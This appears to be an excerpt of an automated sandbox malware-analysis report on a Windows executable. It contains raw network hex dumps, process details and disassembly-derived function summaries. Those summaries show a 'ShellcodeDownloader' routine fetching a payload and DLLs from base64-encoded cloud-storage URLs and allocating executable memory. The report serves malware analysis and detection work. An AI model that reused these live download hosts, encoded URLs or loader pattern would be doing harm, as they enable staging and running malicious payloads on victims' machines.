2024-07-25 09:25:52 UTC	8184	IN	Data Raw: 00 c7 45 f8 00 00 00 00 89 7d f4 0f 8e c1 00 00 00 8b 47 04 85 c0 0f 84 9a 00 00 00 ff 70 10 ff 70 0c ff 70 08 ff 70 04 68 3c f9 13 10 e8 1b fa 00 00 8b 37 83 c4 14 83 7b 20 00 c7 45 fc 00 00 00 00 76 72 8b 56 0c 8b c2 8b 5e 04 2b c3 8b 4e 08 8b 3e 50 8b c1 2b c7 50 52 51 53 57 68 58 f9 13 10 e8 e6 f9 00 00 8b 7e 1c 83 c4 1c 85 ff 74 30 33 db 39 5e 18 76 29 83 c7 1c 8b ff 8b 07 ff 70 10 ff 70 0c ff 70 08 ff 70 04 68 80 f9 13 10 e8 b8 f9 00 00 43 8d 7f 3c 83 c4 14 3b 5e 18 72 dc 8b 45 fc 83 c6 34 8b 5d ec 40 89 45 fc 3b 43 20 72 91 8b 7d f4 8b 45 f8 83 c7 24 40 89 7d f4 89 45 f8 0f b7 c0 3b 43 30 0f 8c 42 ff ff ff 8b 75 f0 8b 7d e4 46 83 c3 3c 0f b7 c6 89 75 f0 89 5d ec 3b 07 0f 8c f8 fe ff ff 8b 45 e8 81 c7 04 02 00 00 8b 4d e0 40 89 45 e8 0f b7 c0 89 7d Data Ascii: E}Gpppph<7{ EvrV^+N>P+PRQSWhX~t039^v)pppphC<;^rE4]@E;C r}E$@}E;C0Bu}F<u];EM@E}
2024-07-25 09:25:52 UTC	8184	IN	Data Raw: 08 56 0f b7 32 3b 71 38 7e 13 68 d0 fa 13 10 e8 41 da 00 00 83 c4 04 83 c8 ff 5e 5d c3 8b 41 54 83 f8 04 74 1f 83 f8 10 75 34 8b 49 34 85 c9 74 e6 83 79 28 00 7f e0 8b 49 20 e8 56 07 00 00 33 c0 5e 5d c3 8d 42 04 69 d6 1c 01 00 00 6a 04 50 8b 41 40 03 50 14 e8 5a 07 00 00 83 c4 08 33 c0 5e 5d c3 cc cc 55 8b ec 8b 45 08 56 8b 75 0c 0f b7 56 08 3b 50 38 7e 13 68 00 fb 13 10 e8 d3 d9 00 00 83 c4 04 83 c8 ff 5e 5d c3 8b 48 54 83 f9 04 74 17 83 f9 10 75 28 8b 40 34 85 c0 74 e6 83 78 28 00 7f e0 8b 40 20 eb 03 8b 40 40 8b 48 14 8a 46 0b 69 d2 1c 01 00 00 88 84 11 d5 00 00 00 33 c0 5e 5d c3 55 8b ec 8b 4d 08 8b 55 0c 83 c2 08 8b 41 54 83 f8 04 74 23 83 f8 10 75 26 8b 49 34 85 c9 75 05 83 c8 ff 5d c3 83 79 28 00 7f f5 8b 49 20 e8 5d 07 00 00 33 c0 5d c3 8b 49 40 Data Ascii: V2;q8~hA^]ATtu4I4ty(I V3^]BijPA@PZ3^]UEVuV;P8~h^]HTtu(@4tx(@ @@HFi3^]UMUATt#u&I4u]y(I ]3]I@
2024-07-25 09:25:52 UTC	8184	IN	Data Raw: ba 12 00 8b e5 5d c3 81 f9 01 04 00 00 74 0d 68 5c fc 13 10 e8 44 ba 00 00 83 c4 04 8b 53 10 bf 03 00 00 00 33 f6 89 7c 24 40 85 d2 7e 13 8b 4b 18 8b 01 83 78 28 00 74 0b 46 83 c1 04 3b f2 7c f0 83 ce ff 89 74 24 44 85 f6 78 28 ba 01 00 00 00 8b cb e8 d5 6b ff ff 89 44 24 48 85 c0 78 14 ba 02 00 00 00 8b cb e8 c1 6b ff ff 89 44 24 4c 85 c0 79 54 68 a8 fc 13 10 e9 6c ff ff ff 81 f9 01 03 00 00 74 0d 68 5c fc 13 10 e8 cd b9 00 00 83 c4 04 8b 53 10 bf 01 00 00 00 33 f6 89 7c 24 40 85 d2 7e 18 8b 4b 18 eb 03 8d 49 00 8b 01 83 78 28 00 74 0b 46 83 c1 04 3b f2 7c f0 83 ce ff 89 74 24 44 85 f6 eb aa 8b 53 18 8b 04 b2 8b 48 10 8b 70 18 89 4c 24 14 8b 48 14 89 4c 24 10 33 c9 89 74 24 18 85 ff 7e 3f 8d 64 24 00 8b 44 8c 44 8b 74 24 14 8b 04 82 39 70 10 8b 74 24 18 Data Ascii: ]th\DS3\|$@~Kx(tF;\|t$Dx(kD$HxkD$LyThlth\S3\|$@~KIx(tF;\|t$DSHpL$HL$3t$~?d$DDt$9pt$
2024-07-25 09:25:52 UTC	8184	IN	Data Raw: ff 83 f9 30 74 09 83 f9 31 0f 85 9c fe ff ff 85 ff 74 05 8d 41 d0 89 07 5f 33 c0 5e c3 83 4e 08 04 5f 83 c8 ff 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 53 8b 1d f8 d1 13 10 56 57 89 55 fc 8b f1 f6 46 08 07 0f 85 ac 01 00 00 8b 46 40 85 c0 78 09 39 46 3c 0f 8d 98 01 00 00 ff 4e 1c 79 64 f6 06 01 75 05 83 cf ff eb 67 ff 76 14 8b 46 10 8b 4e 34 83 4e 04 10 50 ff 76 38 89 46 18 8b 01 ff d0 83 c4 0c 89 46 1c 85 c0 7f 22 79 10 83 4e 08 02 83 cf ff c7 46 1c 00 00 00 00 eb 33 83 4e 08 01 83 cf ff c7 46 1c 00 00 00 00 eb 23 48 89 46 1c 79 10 ba 01 00 00 00 8b ce e8 9f 11 ff ff 8b f8 eb 0d 8b 46 18 ff 46 3c 0f b6 38 40 89 46 18 83 ff ff 0f 84 1d 01 00 00 83 ff 23 0f 85 ac 00 00 00 f6 46 08 07 0f 85 0a 01 00 00 8b 46 40 85 c0 78 09 39 46 3c 0f 8d Data Ascii: 0t1tA_3^N_^UQSVWUFF@x9F<NydugvFN4NPv8FF"yNF3NF#HFyFF<8@F#FF@x9F<
2024-07-25 09:25:52 UTC	8184	IN	Data Raw: 8b 43 2c 0f bf 7c c8 02 8d 04 c8 0f bf 08 0f bf 58 04 e9 d4 01 00 00 8b f9 8b d9 e9 cb 01 00 00 f6 46 08 07 0f 85 41 03 00 00 8b 46 40 85 c0 78 09 39 46 3c 0f 8d 2d 03 00 00 ff 4e 1c 79 64 f6 06 01 75 05 83 cb ff eb 67 ff 76 14 8b 46 10 8b 4e 34 83 4e 04 10 50 ff 76 38 89 46 18 8b 01 ff d0 83 c4 0c 89 46 1c 85 c0 7f 22 79 10 83 4e 08 02 83 cb ff c7 46 1c 00 00 00 00 eb 33 83 4e 08 01 83 cb ff c7 46 1c 00 00 00 00 eb 23 48 89 46 1c 79 10 ba 01 00 00 00 8b ce e8 ce f1 fe ff 8b d8 eb 0d 8b 46 18 ff 46 3c 0f b6 18 40 89 46 18 83 fb ff 0f 84 b2 02 00 00 f6 46 08 07 0f 85 a8 02 00 00 8b 46 40 85 c0 78 09 39 46 3c 0f 8d 94 02 00 00 ff 4e 1c 79 64 f6 06 01 75 05 83 cf ff eb 67 ff 76 14 8b 46 10 8b 4e 34 83 4e 04 10 50 ff 76 38 89 46 18 8b 01 ff d0 83 c4 0c 89 46 Data Ascii: C,\|XFAF@x9F<-NydugvFN4NPv8FF"yNF3NF#HFyFF<@FFF@x9F<NydugvFN4NPv8FF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49722	43.153.232.151	443	4800	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 09:25:55 UTC	133	OUT	GET /libcurl.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: www80-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 09:25:56 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 38896 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 09:25:55 GMT ETag: "da33ad352674b718a8b1ebbb6d77a38b" Last-Modified: Wed, 20 Mar 2024 00:12:00 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 11243683211203548510 x-cos-request-id: NjZhMjFhMjNfZTgwZTc5MWVfOTFhZV81ZjVhOTE= x-cos-server-side-encryption: AES256
2024-07-25 09:25:56 UTC	15912	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cf 77 5a b1 8b 16 34 e2 8b 16 34 e2 8b 16 34 e2 82 6e a7 e2 89 16 34 e2 49 97 35 e3 89 16 34 e2 49 97 31 e3 80 16 34 e2 49 97 30 e3 81 16 34 e2 49 97 37 e3 8a 16 34 e2 c0 6e 35 e3 88 16 34 e2 8b 16 35 e2 af 16 34 e2 64 94 3d e3 89 16 34 e2 64 94 34 e3 8a 16 34 e2 64 94 cb e2 8a 16 34 e2 8b 16 a3 e2 8a 16 34 e2 64 94 36 e3 8a 16 34 e2 52 69 63 68 8b 16 34 e2 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wZ444n4I54I14I04I74n5454d=4d44d44d64Rich4
2024-07-25 09:25:56 UTC	8188	IN	Data Raw: 04 00 00 00 2e 72 74 63 24 49 41 41 00 00 00 00 84 26 00 00 04 00 00 00 2e 72 74 63 24 49 5a 5a 00 00 00 00 88 26 00 00 04 00 00 00 2e 72 74 63 24 54 41 41 00 00 00 00 8c 26 00 00 04 00 00 00 2e 72 74 63 24 54 5a 5a 00 00 00 00 90 26 00 00 90 00 00 00 2e 78 64 61 74 61 24 78 00 00 00 00 20 27 00 00 80 00 00 00 2e 65 64 61 74 61 00 00 a0 27 00 00 50 00 00 00 2e 69 64 61 74 61 24 32 00 00 00 00 f0 27 00 00 14 00 00 00 2e 69 64 61 74 61 24 33 00 00 00 00 04 28 00 00 74 00 00 00 2e 69 64 61 74 61 24 34 00 00 00 00 78 28 00 00 82 02 00 00 2e 69 64 61 74 61 24 36 00 00 00 00 00 30 00 00 18 00 00 00 2e 64 61 74 61 00 00 00 18 30 00 00 74 03 00 00 2e 62 73 73 00 00 00 00 00 40 00 00 a0 00 00 00 2e 72 73 72 63 24 30 31 00 00 00 00 a0 40 00 00 08 05 00 00 2e 72 73 Data Ascii: .rtc$IAA&.rtc$IZZ&.rtc$TAA&.rtc$TZZ&.xdata$x '.edata'P.idata$2'.idata$3(t.idata$4x(.idata$60.data0t.bss@.rsrc$01@.rs
2024-07-25 09:25:56 UTC	14796	IN	Data Raw: 04 0a 13 0e 44 69 67 69 43 65 72 74 2c 20 49 6e 63 2e 31 41 30 3f 06 03 55 04 03 13 38 44 69 67 69 43 65 72 74 20 54 72 75 73 74 65 64 20 47 34 20 43 6f 64 65 20 53 69 67 6e 69 6e 67 20 52 53 41 34 30 39 36 20 53 48 41 33 38 34 20 32 30 32 31 20 43 41 31 02 10 08 57 97 42 a9 53 ba d9 0d 42 37 a3 f3 e3 8c 5e 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 a0 7c 30 10 06 0a 2b 06 01 04 01 82 37 02 01 0c 31 02 30 00 30 19 06 09 2a 86 48 86 f7 0d 01 09 03 31 0c 06 0a 2b 06 01 04 01 82 37 02 01 04 30 1c 06 0a 2b 06 01 04 01 82 37 02 01 0b 31 0e 30 0c 06 0a 2b 06 01 04 01 82 37 02 01 15 30 2f 06 09 2a 86 48 86 f7 0d 01 09 04 31 22 04 20 c6 ae b7 06 5f e7 e4 c3 2b 66 c5 ee c0 33 67 15 97 84 ae e0 c8 8c 8f 0d 7b 30 44 4a 2b 04 36 bf 30 0d 06 09 2a 86 48 86 f7 0d 01 Data Ascii: DigiCert, Inc.1A0?U8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1WBSB7^0`He\|0+7100H1+70+710+70/H1" _+f3g{0DJ+60*H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49723	159.75.57.35	443	4800	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 09:26:02 UTC	137	OUT	GET /qd.bin HTTP/1.1 User-Agent: ShellcodeDownloader Host: wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com Cache-Control: no-cache
2024-07-25 09:26:02 UTC	235	IN	HTTP/1.1 451 Unavailable For Legal Reasons Content-Type: application/xml Content-Length: 477 Connection: close Date: Thu, 25 Jul 2024 09:26:02 GMT Server: tencent-cos x-cos-request-id: NjZhMjFhMmFfYzVkMmIyMDlfOTUyY18yNGI1OWMz
2024-07-25 09:26:02 UTC	477	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 75 74 66 2d 38 27 20 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 09 3c 43 6f 64 65 3e 55 6e 61 76 61 69 6c 61 62 6c 65 46 6f 72 4c 65 67 61 6c 52 65 61 73 6f 6e 73 3c 2f 43 6f 64 65 3e 0a 09 3c 4d 65 73 73 61 67 65 3e 44 75 65 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 20 69 73 20 61 72 72 65 61 72 73 2c 20 69 74 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 20 75 6e 74 69 6c 20 79 6f 75 20 72 65 63 68 61 72 67 65 2e 3c 2f 4d 65 73 73 61 67 65 3e 0a 09 3c 52 65 73 6f 75 72 63 65 3e 2f 71 64 2e 62 69 6e 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 09 3c 52 65 71 75 65 73 74 49 64 3e 4e 6a 5a 68 4d 6a 46 68 4d 6d 46 66 59 7a 56 6b 4d 6d 49 79 4d 44 6c 66 4f 54 55 79 59 31 38 79 4e 47 Data Ascii: <?xml version='1.0' encoding='utf-8' ?><Error><Code>UnavailableForLegalReasons</Code><Message>Due to your account is arrears, it is unavailable until you recharge.</Message><Resource>/qd.bin</Resource><RequestId>NjZhMjFhMmFfYzVkMmIyMDlfOTUyY18yNG

Target ID:	0
Start time:	05:25:29
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002B_78.exe"
Imagebase:	0xaa0000
File size:	916'089 bytes
MD5 hash:	89D61660F3E47A8A0F7AE37D5F8F03ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:25:29
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:26:02
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1156
Imagebase:	0x3d0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	60

Executed Functions

Function 00AA2EC0 Relevance: 54.4, APIs: 16, Strings: 15, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE(?), ref: 00AA2EE5
CreateDirectoryA.KERNELBASE(C:\Program Files (x86)\Mysoftwaref,00000000), ref: 00AA2F05

Part of subcall function 00AA2CB0: InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00AA2CDB
Part of subcall function 00AA2CB0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00AA2D19
Part of subcall function 00AA2CB0: task.LIBCPMTD ref: 00AA2D25
Part of subcall function 00AA2CB0: InternetReadFile.WININET(00000000,00000001,00000400,00000000), ref: 00AA2D87
Part of subcall function 00AA2CB0: InternetCloseHandle.WININET(00000000), ref: 00AA2DC1
Part of subcall function 00AA2CB0: InternetCloseHandle.WININET(00000000), ref: 00AA2DDD

task.LIBCPMTD ref: 00AA2F47
task.LIBCPMTD ref: 00AA2F56
task.LIBCPMTD ref: 00AA2F97
task.LIBCPMTD ref: 00AA2FA6
task.LIBCPMTD ref: 00AA2FF6
task.LIBCPMTD ref: 00AA3008
task.LIBCPMTD ref: 00AA3058
task.LIBCPMTD ref: 00AA306A
task.LIBCPMTD ref: 00AA30BA
task.LIBCPMTD ref: 00AA30CC
task.LIBCPMTD ref: 00AA311C
task.LIBCPMTD ref: 00AA312E
task.LIBCPMTD ref: 00AA317E
task.LIBCPMTD ref: 00AA3190

Strings

C:\Program Files (x86)\Mysoftwaref\libcurl.dll, xrefs: 00AA3133
C:\Program Files (x86)\Mysoftwaref\msvcp120.dll, xrefs: 00AA2F5B
C:\Program Files (x86)\Mysoftwaref\msvcr120.dll, xrefs: 00AA2FAB
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDEyMC5kbGw=, xrefs: 00AA2F6F
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9RVDIuZXhl, xrefs: 00AA2F1F
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcjEyMC5kbGw=, xrefs: 00AA2FC2
aHR0cHM6Ly93d3c4MC0xMzIzNTcwOTU5LmNvcy5hcC1zaW5nYXBvcmUubXlxY2xvdWQuY29tL2xpYmN1cmwuZGxs, xrefs: 00AA314A
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDE0MC5kbGw=, xrefs: 00AA3086
C:\Program Files (x86)\Mysoftwaref\vcruntime140.dll, xrefs: 00AA300D
C:\Program Files (x86)\Mysoftwaref\msvcp140.dll, xrefs: 00AA306F
C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll, xrefs: 00AA30D1
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9jeGltYWdlY3J0LmRsbA==, xrefs: 00AA30E8
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS92Y3J1bnRpbWUxNDAuZGxs, xrefs: 00AA3024
C:\Program Files (x86)\Mysoftwaref\software.exe, xrefs: 00AA2F0B
C:\Program Files (x86)\Mysoftwaref, xrefs: 00AA2F00

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: task$Internet$CloseHandleOpen$CreateDirectoryFileInfoReadSystem
String ID: C:\Program Files (x86)\Mysoftwaref$C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll$C:\Program Files (x86)\Mysoftwaref\libcurl.dll$C:\Program Files (x86)\Mysoftwaref\msvcp120.dll$C:\Program Files (x86)\Mysoftwaref\msvcp140.dll$C:\Program Files (x86)\Mysoftwaref\msvcr120.dll$C:\Program Files (x86)\Mysoftwaref\software.exe$C:\Program Files (x86)\Mysoftwaref\vcruntime140.dll$aHR0cHM6Ly93d3c4MC0xMzIzNTcwOTU5LmNvcy5hcC1zaW5nYXBvcmUubXlxY2xvdWQuY29tL2xpYmN1cmwuZGxs$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS92Y3J1bnRpbWUxNDAuZGxs$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9RVDIuZXhl$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9jeGltYWdlY3J0LmRsbA==$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDE0MC5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDEyMC5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcjEyMC5kbGw=
API String ID: 1611864481-1430992863
Opcode ID: c8302574628e2c95955c8323557226e4ac8a312efc0d7545a84a0be78458683d
Instruction ID: 6bf3c8d969d3b27f966f74db4c771e65a346050633d356e4ae328f656d96f1a3
Opcode Fuzzy Hash: c8302574628e2c95955c8323557226e4ac8a312efc0d7545a84a0be78458683d
Instruction Fuzzy Hash: D6713A72C00658EACB14EBA0CE46BDDB774BF12310F9086D9A01A672D1EB741B8DDF55

Function 00AA31B0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 223
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA2EC0: GetSystemInfo.KERNELBASE(?), ref: 00AA2EE5
Part of subcall function 00AA2EC0: CreateDirectoryA.KERNELBASE(C:\Program Files (x86)\Mysoftwaref,00000000), ref: 00AA2F05
Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2F47
Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2F56
Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2F97
Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2FA6
Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2FF6
Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA3008
Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA3058
Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA306A

Sleep.KERNELBASE(00000BB8,?,00AC72E3,000000FF), ref: 00AA31DC
InternetOpenA.WININET(ShellcodeDownloader,00000001,00000000,00000000,00000000), ref: 00AA31FD
InternetOpenUrlA.WININET(00000000,00AD3904,00000000,00000000,80000000,00000000), ref: 00AA323D
InternetCloseHandle.WININET(?), ref: 00AA326E
InternetCloseHandle.WININET(?), ref: 00AA32D1
InternetCloseHandle.WININET(?), ref: 00AA32DB
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00AA32FC
InternetCloseHandle.WININET(00000000), ref: 00AA3336
fpos.LIBCPMTD ref: 00AA33C8
fpos.LIBCPMTD ref: 00AA33DD
fpos.LIBCPMTD ref: 00AA340D
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00AD387C,00000024,00000040), ref: 00AA3415
fpos.LIBCPMTD ref: 00AA3445
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AA3474
InternetCloseHandle.WININET(00000000), ref: 00AA3340

Part of subcall function 00AA7950: char_traits.LIBCPMTD ref: 00AA797D

Part of subcall function 00AA7950: char_traits.LIBCPMTD ref: 00AA7AD7

Part of subcall function 00AA7950: char_traits.LIBCPMTD ref: 00AA7BBC

Part of subcall function 00AA38B0: fpos.LIBCPMTD ref: 00AA395A

Strings

error, xrefs: 00AA337A
error, xrefs: 00AA3211
ShellcodeDownloader, xrefs: 00AA31F8
error , xrefs: 00AA32AB
error, xrefs: 00AA3429
error, xrefs: 00AA3251

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: Internettask$CloseHandlefpos$char_traits$OpenVirtual$AllocCreateDirectoryFileFreeInfoReadSleepSystem
String ID: ShellcodeDownloader$error$error$error$error$error
API String ID: 161186730-945787770
Opcode ID: 51ba48fd3eaa70197ef28a39b3bdd556d31e12a00b9fae5a07bceb9d98e23382
Instruction ID: b8475ab97aea51fcfd2b3822e9716484527ccc640cea76df4b2205b81a3ec26d
Opcode Fuzzy Hash: 51ba48fd3eaa70197ef28a39b3bdd556d31e12a00b9fae5a07bceb9d98e23382
Instruction Fuzzy Hash: 9A816A71A40208BBDB14EBA4DD56FEEB774BB5AB00F104519F102772C1DFB86A49CBA1

Function 00AC433E Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AC3FF7: CreateFileW.KERNELBASE(?,00000000,?,00AC43E7,?,?,00000000,?,00AC43E7,?,0000000C), ref: 00AC4014

GetLastError.KERNEL32 ref: 00AC4452
__dosmaperr.LIBCMT ref: 00AC4459
GetFileType.KERNELBASE(00000000), ref: 00AC4465
GetLastError.KERNEL32 ref: 00AC446F
__dosmaperr.LIBCMT ref: 00AC4478
CloseHandle.KERNEL32(00000000), ref: 00AC4498
CloseHandle.KERNEL32(00ABAD9E), ref: 00AC45E5
GetLastError.KERNEL32 ref: 00AC4617
__dosmaperr.LIBCMT ref: 00AC461E

Strings

H, xrefs: 00AC45A3

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: cb90a8935159640fa270dd1e410ab7b26ef677b05e43d7d06016832b2bc99738
Instruction ID: 595fffdf429874b7de0a1f7035937afe424ef628f9f562911936d93298c8ea7a
Opcode Fuzzy Hash: cb90a8935159640fa270dd1e410ab7b26ef677b05e43d7d06016832b2bc99738
Instruction Fuzzy Hash: F7A12532A141549FCF19DFA8DD62FAD7BB0AB4A320F29015DF801AF392CB348916CB55

Function 00AA2CB0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00AA2CDB

Part of subcall function 00AA2B40: task.LIBCPMTD ref: 00AA2C92

InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00AA2D19
task.LIBCPMTD ref: 00AA2D25
InternetReadFile.WININET(00000000,00000001,00000400,00000000), ref: 00AA2D87
InternetCloseHandle.WININET(00000000), ref: 00AA2DC1
InternetCloseHandle.WININET(00000000), ref: 00AA2DDD

Strings

Mozilla/5.0, xrefs: 00AA2CD6

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
